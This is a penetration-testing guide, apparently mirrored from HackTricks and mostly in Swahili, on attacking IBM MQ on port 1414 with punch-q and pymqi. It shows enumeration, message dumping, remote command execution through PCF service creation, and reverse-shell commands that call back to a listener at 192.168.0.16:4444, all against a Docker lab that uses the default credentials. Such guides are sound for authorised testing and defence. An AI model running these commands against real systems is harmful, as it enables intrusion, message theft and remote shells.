mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-01 17:10:07 +00:00
343 lines
18 KiB
Markdown
343 lines
18 KiB
Markdown
# 1414 - Pentesting IBM MQ
|
||
|
||
{% hint style="success" %}
|
||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Support HackTricks</summary>
|
||
|
||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
{% endhint %}
|
||
|
||
## Basic information
|
||
|
||
IBM MQ ni teknolojia ya IBM ya kusimamia foleni za ujumbe. Kama teknolojia nyingine za **message broker**, inakusudia kupokea, kuhifadhi, kuchakata na kuainisha taarifa kati ya wazalishaji na watumiaji.
|
||
|
||
Kwa kawaida, **inaonyesha bandari ya TCP ya IBM MQ 1414**. Wakati mwingine, API ya HTTP REST inaweza kuonyeshwa kwenye bandari **9443**. Vipimo (Prometheus) vinaweza pia kufikiwa kutoka bandari ya TCP **9157**.
|
||
|
||
Bandari ya TCP ya IBM MQ 1414 inaweza kutumika kudhibiti ujumbe, foleni, kanali, ... lakini **pia kudhibiti mfano**.
|
||
|
||
IBM inatoa hati kubwa ya kiufundi inayopatikana kwenye [https://www.ibm.com/docs/en/ibm-mq](https://www.ibm.com/docs/en/ibm-mq).
|
||
|
||
## Tools
|
||
|
||
Zana inayopendekezwa kwa matumizi rahisi ni **[punch-q](https://github.com/sensepost/punch-q)**, kwa matumizi ya Docker. Zana hii inatumia maktaba ya Python `pymqi`.
|
||
|
||
Kwa njia ya zaidi ya mikono, tumia maktaba ya Python **[pymqi](https://github.com/dsuch/pymqi)**. [IBM MQ dependencies](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc) zinahitajika.
|
||
|
||
### Installing pymqi
|
||
|
||
**IBM MQ dependencies** zinahitaji kusanikishwa na kupakiwa:
|
||
|
||
1. Unda akaunti (IBMid) kwenye [https://login.ibm.com/](https://login.ibm.com/).
|
||
2. Pakua maktaba za IBM MQ kutoka [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc). Kwa Linux x86_64 ni **9.0.0.4-IBM-MQC-LinuxX64.tar.gz**.
|
||
3. Fanya dekompresi (`tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz`).
|
||
4. Endesha `sudo ./mqlicense.sh` kukubali masharti ya leseni.
|
||
|
||
>If you are under Kali Linux, modify the file `mqlicense.sh`: remove/comment the following lines (between lines 105-110):
|
||
>
|
||
>```bash
|
||
>if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ]
|
||
> then
|
||
> echo "ERROR: This package is incompatible with this system"
|
||
> echo " This package was built for ${BUILD_PLATFORM}"
|
||
> exit 1
|
||
>fi
|
||
>```
|
||
|
||
5. Sanidha hizi pakiti:
|
||
```bash
|
||
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.x86_64.rpm
|
||
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm
|
||
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm
|
||
```
|
||
6. Kisha, ongeza kwa muda faili za `.so` kwenye LD: `export LD_LIBRARY_PATH=/opt/mqm/lib64`, **kabla** ya kutumia zana nyingine zinazotumia utegemezi hizi.
|
||
|
||
Kisha, unaweza kunakili mradi [**pymqi**](https://github.com/dsuch/pymqi): ina vipande vya msimbo vya kuvutia, constants, ... Au unaweza kufunga maktaba moja kwa moja kwa: `pip install pymqi`.
|
||
|
||
### Kutumia punch-q
|
||
|
||
#### Kwa Docker
|
||
|
||
Tumia tu: `sudo docker run --rm -ti leonjza/punch-q`.
|
||
|
||
#### Bila Docker
|
||
|
||
Nakili mradi [**punch-q**](https://github.com/sensepost/punch-q) kisha fuata readme kwa ajili ya usakinishaji (`pip install -r requirements.txt && python3 setup.py install`).
|
||
|
||
Baada ya hapo, inaweza kutumika na amri `punch-q`.
|
||
|
||
## Enumeration
|
||
|
||
Unaweza kujaribu kuorodhesha **jina la meneja wa foleni, watumiaji, vituo na foleni** kwa kutumia **punch-q** au **pymqi**.
|
||
|
||
### Meneja wa Foleni
|
||
|
||
Wakati mwingine, hakuna ulinzi dhidi ya kupata jina la Meneja wa Foleni:
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name
|
||
Queue Manager name: MYQUEUEMGR
|
||
```
|
||
### Channels
|
||
|
||
**punch-q** inatumia orodha ya maneno ya ndani (inayoweza kubadilishwa) kutafuta vituo vilivyopo. Mfano wa matumizi:
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels
|
||
"DEV.ADMIN.SVRCONN" exists and was authorised.
|
||
"SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised.
|
||
"SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.
|
||
```
|
||
Inatokea kwamba baadhi ya mifano ya IBM MQ zinakubali maombi ya MQ **yasiyo na uthibitisho**, hivyo `--username / --password` hazihitajiki. Kwa hakika, haki za ufikiaji pia zinaweza kutofautiana.
|
||
|
||
Pale tunapopata jina moja la channel (hapa: `DEV.ADMIN.SVRCONN`), tunaweza kuhesabu channel zingine zote.
|
||
|
||
Hesabu hiyo inaweza kufanywa kimsingi na kipande hiki cha msimbo `code/examples/dis_channels.py` kutoka **pymqi**:
|
||
```python
|
||
import logging
|
||
import pymqi
|
||
|
||
logging.basicConfig(level=logging.INFO)
|
||
|
||
queue_manager = 'MYQUEUEMGR'
|
||
channel = 'DEV.ADMIN.SVRCONN'
|
||
host = '172.17.0.2'
|
||
port = '1414'
|
||
conn_info = '%s(%s)' % (host, port)
|
||
user = 'admin'
|
||
password = 'passw0rd'
|
||
|
||
prefix = '*'
|
||
|
||
args = {pymqi.CMQCFC.MQCACH_CHANNEL_NAME: prefix}
|
||
|
||
qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
|
||
pcf = pymqi.PCFExecute(qmgr)
|
||
|
||
try:
|
||
response = pcf.MQCMD_INQUIRE_CHANNEL(args)
|
||
except pymqi.MQMIError as e:
|
||
if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME:
|
||
logging.info('No channels matched prefix `%s`' % prefix)
|
||
else:
|
||
raise
|
||
else:
|
||
for channel_info in response:
|
||
channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME]
|
||
logging.info('Found channel `%s`' % channel_name)
|
||
|
||
qmgr.disconnect()
|
||
|
||
```
|
||
... Lakini **punch-q** pia inaingiza sehemu hiyo (ikiwa na maelezo zaidi!).
|
||
Inaweza kuzinduliwa na:
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*'
|
||
Showing channels with prefix: "*"...
|
||
|
||
| Name | Type | MCA UID | Conn Name | Xmit Queue | Description | SSL Cipher |
|
||
|----------------------|-------------------|---------|-----------|------------|-----------------|------------|
|
||
| DEV.ADMIN.SVRCONN | Server-connection | | | | | |
|
||
| DEV.APP.SVRCONN | Server-connection | app | | | | |
|
||
| SYSTEM.AUTO.RECEIVER | Receiver | | | | Auto-defined by | |
|
||
| SYSTEM.AUTO.SVRCONN | Server-connection | | | | Auto-defined by | |
|
||
| SYSTEM.DEF.AMQP | AMQP | | | | | |
|
||
| SYSTEM.DEF.CLUSRCVR | Cluster-receiver | | | | | |
|
||
| SYSTEM.DEF.CLUSSDR | Cluster-sender | | | | | |
|
||
| SYSTEM.DEF.RECEIVER | Receiver | | | | | |
|
||
| SYSTEM.DEF.REQUESTER | Requester | | | | | |
|
||
| SYSTEM.DEF.SENDER | Sender | | | | | |
|
||
| SYSTEM.DEF.SERVER | Server | | | | | |
|
||
| SYSTEM.DEF.SVRCONN | Server-connection | | | | | |
|
||
| SYSTEM.DEF.CLNTCONN | Client-connection | | | | | |
|
||
```
|
||
### Queues
|
||
|
||
Kuna kipande cha msimbo chenye **pymqi** (`dis_queues.py`) lakini **punch-q** inaruhusu kupata vipande zaidi vya taarifa kuhusu foleni:
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*'
|
||
Showing queues with prefix: "*"...
|
||
| Created | Name | Type | Usage | Depth | Rmt. QM | Rmt. Qu | Description |
|
||
| | | | | | GR Name | eue Nam | |
|
||
| | | | | | | e | |
|
||
|-----------|----------------------|--------|---------|--------|---------|---------|-----------------------------------|
|
||
| 2023-10-1 | DEV.DEAD.LETTER.QUEU | Local | Normal | 0 | | | |
|
||
| 0 18.35.1 | E | | | | | | |
|
||
| 9 | | | | | | | |
|
||
| 2023-10-1 | DEV.QUEUE.1 | Local | Normal | 0 | | | |
|
||
| 0 18.35.1 | | | | | | | |
|
||
| 9 | | | | | | | |
|
||
| 2023-10-1 | DEV.QUEUE.2 | Local | Normal | 0 | | | |
|
||
| 0 18.35.1 | | | | | | | |
|
||
| 9 | | | | | | | |
|
||
| 2023-10-1 | DEV.QUEUE.3 | Local | Normal | 0 | | | |
|
||
| 0 18.35.1 | | | | | | | |
|
||
| 9 | | | | | | | |
|
||
# Truncated
|
||
```
|
||
## Exploit
|
||
|
||
### Dump messages
|
||
|
||
Unaweza kulenga foleni(s)/kanali(s) ili kunusa / kutupa ujumbe kutoka kwao (operesheni isiyo na uharibifu). *Examples:*
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages sniff
|
||
```
|
||
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump
|
||
```
|
||
**Usisite kurudia kwenye foleni zote zilizotambuliwa.**
|
||
|
||
### Utekelezaji wa msimbo
|
||
|
||
> Maelezo machache kabla ya kuendelea: IBM MQ inaweza kudhibitiwa kwa njia nyingi: MQSC, PCF, Command ya Kudhibiti. Orodha za jumla zinaweza kupatikana katika [nyaraka za IBM MQ](https://www.ibm.com/docs/en/ibm-mq/9.2?topic=reference-command-sets-comparison).
|
||
> [**PCF**](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=commands-introduction-mq-programmable-command-formats) (***Mifumo ya Amri Inayoweza Kuprogramishwa***) ndiyo tunayoangazia ili kuingiliana kwa mbali na mfano. **punch-q** na zaidi **pymqi** zinategemea mwingiliano wa PCF.
|
||
>
|
||
> Unaweza kupata orodha ya amri za PCF:
|
||
> * [Kutoka kwa nyaraka za PCF](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=reference-definitions-programmable-command-formats), na
|
||
> * [kutoka kwa constants](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqcmd-command-codes).
|
||
>
|
||
> Amri moja ya kuvutia ni `MQCMD_CREATE_SERVICE` na nyaraka zake zinapatikana [hapa](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-change-copy-create-service-multiplatforms). Inachukua kama hoja `StartCommand` inayotaja programu ya ndani kwenye mfano (mfano: `/bin/sh`).
|
||
>
|
||
> Pia kuna onyo la amri katika nyaraka: *"Kumbuka: Amri hii inaruhusu mtumiaji kuendesha amri yoyote kwa mamlaka ya mqm. Ikiwa haki za kutumia amri hii zitatolewa, mtumiaji mbaya au asiye makini anaweza kufafanua huduma ambayo inaharibu mifumo yako au data, kwa mfano, kwa kufuta faili muhimu."*
|
||
>
|
||
> *Kumbuka: kila wakati kulingana na nyaraka za IBM MQ (Marejeo ya Usimamizi), pia kuna kiunganishi cha HTTP kwenye `/admin/action/qmgr/{qmgrName}/mqsc` ili kuendesha amri sawa ya MQSC kwa ajili ya uundaji wa huduma (`DEFINE SERVICE`). Kipengele hiki hakijajadiliwa hapa bado.*
|
||
|
||
Uundaji / kufuta huduma kwa PCF kwa ajili ya utekelezaji wa programu ya mbali unaweza kufanywa na **punch-q**:
|
||
|
||
**Mfano 1**
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id"
|
||
```
|
||
> Katika kumbukumbu za IBM MQ, unaweza kusoma amri imefanikiwa kutekelezwa:
|
||
>
|
||
> ```bash
|
||
> 2023-10-10T19:13:01.713Z AMQ5030I: Amri '808544aa7fc94c48' imeanza. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]
|
||
> ```
|
||
|
||
Unaweza pia kuhesabu programu zilizopo kwenye mashine (hapa `/bin/doesnotexist` ... haipo):
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
|
||
s "whatever"
|
||
Command: /bin/doesnotexist
|
||
Arguments: -c id
|
||
Service Name: 6e3ef5af652b4436
|
||
|
||
Creating service...
|
||
Starting service...
|
||
The program '/bin/doesnotexist' is not available on the remote system.
|
||
Giving the service 0 second(s) to live...
|
||
Cleaning up service...
|
||
Done
|
||
```
|
||
**Kumbuka kwamba uzinduzi wa programu ni wa asenkroni. Hivyo unahitaji kipengele cha pili ili kutumia exploit** ***(listener kwa ajili ya reverse shell, uundaji wa faili kwenye huduma tofauti, uhamasishaji wa data kupitia mtandao ...)**
|
||
|
||
**Mfano wa 2**
|
||
|
||
Kwa reverse shell rahisi, **punch-q** inapendekeza pia payloads mbili za reverse shell:
|
||
|
||
* Moja na bash
|
||
* Moja na perl
|
||
|
||
*Kwa hakika unaweza kujenga moja maalum kwa kutumia amri ya `execute`.*
|
||
|
||
Kwa bash:
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
|
||
```
|
||
Kwa perl:
|
||
```bash
|
||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
|
||
```
|
||
### Custom PCF
|
||
|
||
Unaweza kuchimba katika nyaraka za IBM MQ na kutumia moja kwa moja maktaba ya **pymqi** ya python ili kujaribu amri maalum za PCF ambazo hazijatekelezwa katika **punch-q**.
|
||
|
||
**Example:**
|
||
```python
|
||
import pymqi
|
||
|
||
queue_manager = 'MYQUEUEMGR'
|
||
channel = 'DEV.ADMIN.SVRCONN'
|
||
host = '172.17.0.2'
|
||
port = '1414'
|
||
conn_info = '%s(%s)' % (host, port)
|
||
user = 'admin'
|
||
password = 'passw0rd'
|
||
|
||
qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
|
||
pcf = pymqi.PCFExecute(qmgr)
|
||
|
||
try:
|
||
# Replace here with your custom PCF args and command
|
||
# The constants can be found in pymqi/code/pymqi/CMQCFC.py
|
||
args = {pymqi.CMQCFC.xxxxx: "value"}
|
||
response = pcf.MQCMD_CUSTOM_COMMAND(args)
|
||
except pymqi.MQMIError as e:
|
||
print("Error")
|
||
else:
|
||
# Process response
|
||
|
||
qmgr.disconnect()
|
||
|
||
```
|
||
Ikiwa huwezi kupata majina ya kudumu, unaweza kurejelea [nyaraka za IBM MQ](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqca-character-attribute-selectors).
|
||
|
||
> *Mfano wa [`MQCMD_REFRESH_CLUSTER`](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-mqcmd-refresh-cluster-refresh-cluster) (Decimal = 73). Inahitaji parameter `MQCA_CLUSTER_NAME` (Decimal = 2029) ambayo inaweza kuwa `*` (Doc: ):*
|
||
>
|
||
> ```python
|
||
> import pymqi
|
||
>
|
||
> queue_manager = 'MYQUEUEMGR'
|
||
> channel = 'DEV.ADMIN.SVRCONN'
|
||
> host = '172.17.0.2'
|
||
> port = '1414'
|
||
> conn_info = '%s(%s)' % (host, port)
|
||
> user = 'admin'
|
||
> password = 'passw0rd'
|
||
>
|
||
> qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
|
||
> pcf = pymqi.PCFExecute(qmgr)
|
||
>
|
||
> try:
|
||
> args = {2029: "*"}
|
||
> response = pcf.MQCMD_REFRESH_CLUSTER(args)
|
||
> except pymqi.MQMIError as e:
|
||
> print("Error")
|
||
> else:
|
||
> print(response)
|
||
>
|
||
> qmgr.disconnect()
|
||
> ```
|
||
|
||
## Mazingira ya kupima
|
||
|
||
Ikiwa unataka kupima tabia na matumizi ya IBM MQ, unaweza kuunda mazingira ya ndani kulingana na Docker:
|
||
|
||
1. Kuwa na akaunti kwenye ibm.com na cloud.ibm.com.
|
||
2. Unda IBM MQ iliyowekwa kwenye kontena na:
|
||
```bash
|
||
sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2
|
||
sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2
|
||
```
|
||
Kwa default, uthibitishaji umewezeshwa, jina la mtumiaji ni `admin` na nenosiri ni `passw0rd` (Kigezo cha mazingira `MQ_ADMIN_PASSWORD`). Hapa, jina la meneja wa foleni limewekwa kuwa `MYQUEUEMGR` (kigezo `MQ_QMGR_NAME`).
|
||
|
||
Unapaswa kuwa na IBM MQ ikifanya kazi na bandari zake zikiwa wazi:
|
||
```bash
|
||
❯ sudo docker ps
|
||
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
|
||
58ead165e2fd icr.io/ibm-messaging/mq:9.3.2.0-r2 "runmqdevserver" 3 seconds ago Up 3 seconds 0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp testing-ibmmq
|
||
```
|
||
> Toleo la zamani la picha za IBM MQ docker ziko kwenye: https://hub.docker.com/r/ibmcom/mq/.
|
||
|
||
## References
|
||
|
||
* [mgeeky's gist - "Practical IBM MQ Penetration Testing notes"](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec)
|
||
* [MQ Jumping - DEFCON 15](https://defcon.org/images/defcon-15/dc15-presentations/dc-15-ruks.pdf)
|
||
* [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq)
|